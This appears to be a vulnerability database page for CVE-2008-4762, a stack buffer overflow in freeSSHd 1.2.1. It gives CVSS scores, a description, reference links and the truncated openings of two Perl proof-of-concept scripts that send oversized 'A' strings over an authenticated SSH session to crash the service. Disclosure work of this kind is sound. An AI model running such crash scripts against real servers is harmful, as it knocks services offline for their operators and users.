Published: 28/10/2008 Updated: 11/10/2018

CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8

VMScore: 910

Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.

Vulnerable Product	Search on Vulmon	Subscribe to Product
freesshd freesshd 1.2.1

#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom] # FreeSSH 121 Crash -- A Product of Fuzzing Stay Tuned use Net::SSH2; $host = "1921680187"; $port = 22; $username = "test"; $password = "test"; $dos = "A" x 550000; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) || die "\nE ...

#!/usr/bin/perl # Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom] # FreeSSH 121 Crash #2 -- A Product of Fuzzing Stay Tuned For More use Net::SSH2; $host = "1921680100"; $port = 22; $username = "test"; $password = "test"; $dos = "A" x 262145; $ssh2 = Net::SSH2->new(); $ssh2->connect($host, $port) ...

CWE-119 http://www.securityfocus.com/bid/31872 http://secunia.com/advisories/32366 http://www.securitytracker.com/id?1021096 http://securityreason.com/securityalert/4515 http://www.vupen.com/english/advisories/2008/2897 https://exchange.xforce.ibmcloud.com/vulnerabilities/46046 https://www.exploit-db.com/exploits/6812 https://www.exploit-db.com/exploits/6800 http://www.securityfocus.com/archive/1/497746/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/6800/

CVE-2008-4762

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect